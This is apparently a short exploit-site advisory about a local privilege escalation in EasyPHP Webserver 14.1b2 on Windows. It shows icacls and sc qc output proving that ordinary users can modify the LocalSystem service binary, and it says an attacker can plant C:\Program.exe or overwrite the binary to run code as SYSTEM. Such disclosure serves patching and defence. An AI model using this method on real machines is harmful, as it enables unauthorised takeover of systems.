EasyPHP Webserver 14.1b2 Privilege Escalation

Posted on 21 January 2017
# Exploit Title: [EasyPHP-Webserver Service - Privilege Escalation]
# Date: [date]
# Exploit Author: [Owais Mehtab, Tayeeb Rana]
# Vendor Homepage: [www.easyphp.org/]
# Software Link: [http://www.easyphp.org/easyphp-webserver.php]
# Version: [14.1b2]
# Tested on: [Win7 Sp1]

C:Program Files (x86)EasyPHP-Webserver-14.1b2inarieshttpserverin>icacls ews-httpd.exe
ews-httpd.exe BUILTINUsers:(I)(M)<---
NT AUTHORITYSYSTEM:(I)(F)
BUILTINAdministrators:(I)(F)

C:>sc qc ews-httpserver
[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: ews-httpserver
TYPE : 110 WIN32_OWN_PROCESS (interactive)
START_TYPE : 2 AUTO_START
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME : C:Program Files (x86)EasyPHP-Webserver-14.1b2inarieshttpserverinews-httpd.exe -k ru
nservice
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : ews-httpserver
DEPENDENCIES :
SERVICE_START_NAME : LocalSystem

An attacker may put binary in following locations to run it as localsystem account:-
C:Program.exe
Or Overwrite the binary and restart service
TOP
Malware :

Last 20
Exploits :

Last 20